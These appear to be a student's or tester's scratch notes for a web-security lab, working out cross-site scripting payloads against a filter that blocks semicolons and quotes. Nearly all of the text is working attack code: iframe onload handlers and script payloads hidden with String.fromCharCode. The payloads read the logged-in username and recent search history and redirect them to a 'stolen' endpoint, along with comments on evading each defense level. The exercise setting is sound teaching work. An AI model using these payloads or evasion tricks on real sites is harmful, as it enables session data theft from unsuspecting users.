#So we can't use ; ' or "

#we could use backticks
`

#also this works without the "" around alert, not sure if thats useful
<IFRAME SRC=# onload=alert(0)></IFRAME>

<IFRAME SRC=# onload=$(document).ready(alert(0))></IFRAME>


#can use this
$(document).ready(location.pathname=String.fromCharCode(115, 116, 111, 108, 101, 110, 63, 117, 115, 101, 114, 61) + $(String.fromCharCode(35, 108, 111, 103, 103, 101, 100, 45, 105, 110, 45, 117, 115, 101, 114)).text() + String.fromCharCode(38, 108, 97, 115, 116, 95, 115, 101, 97, 114, 99, 104, 61) + $(String.fromCharCode(35, 104, 105, 115, 116, 111, 114, 121, 45, 108, 105, 115, 116, 32, 46, 104, 105, 115, 116, 111, 114, 121, 45, 105, 116, 101, 109, 58, 101, 113, 40, 49, 41)).text())

#lol the defenses aren't incremental, we can use script again
<script>$(document).ready(function(){location.pathname=String.fromCharCode(115, 116, 111, 108, 101, 110, 63, 120, 115, 115, 100, 101, 102, 101, 110, 115, 101, 61, 51, 38, 117, 115, 101, 114, 61) + $(String.fromCharCode(35, 108, 111, 103, 103, 101, 100, 45, 105, 110, 45, 117, 115, 101, 114)).text() + String.fromCharCode(38, 108, 97, 115, 116, 95, 115, 101, 97, 114, 99, 104, 61) + $(String.fromCharCode(35, 104, 105, 115, 116, 111, 114, 121, 45, 108, 105, 115, 116, 32, 46, 104, 105, 115, 116, 111, 114, 121, 45, 105, 116, 101, 109, 58, 101, 113, 40, 49, 41)).text()})</script>
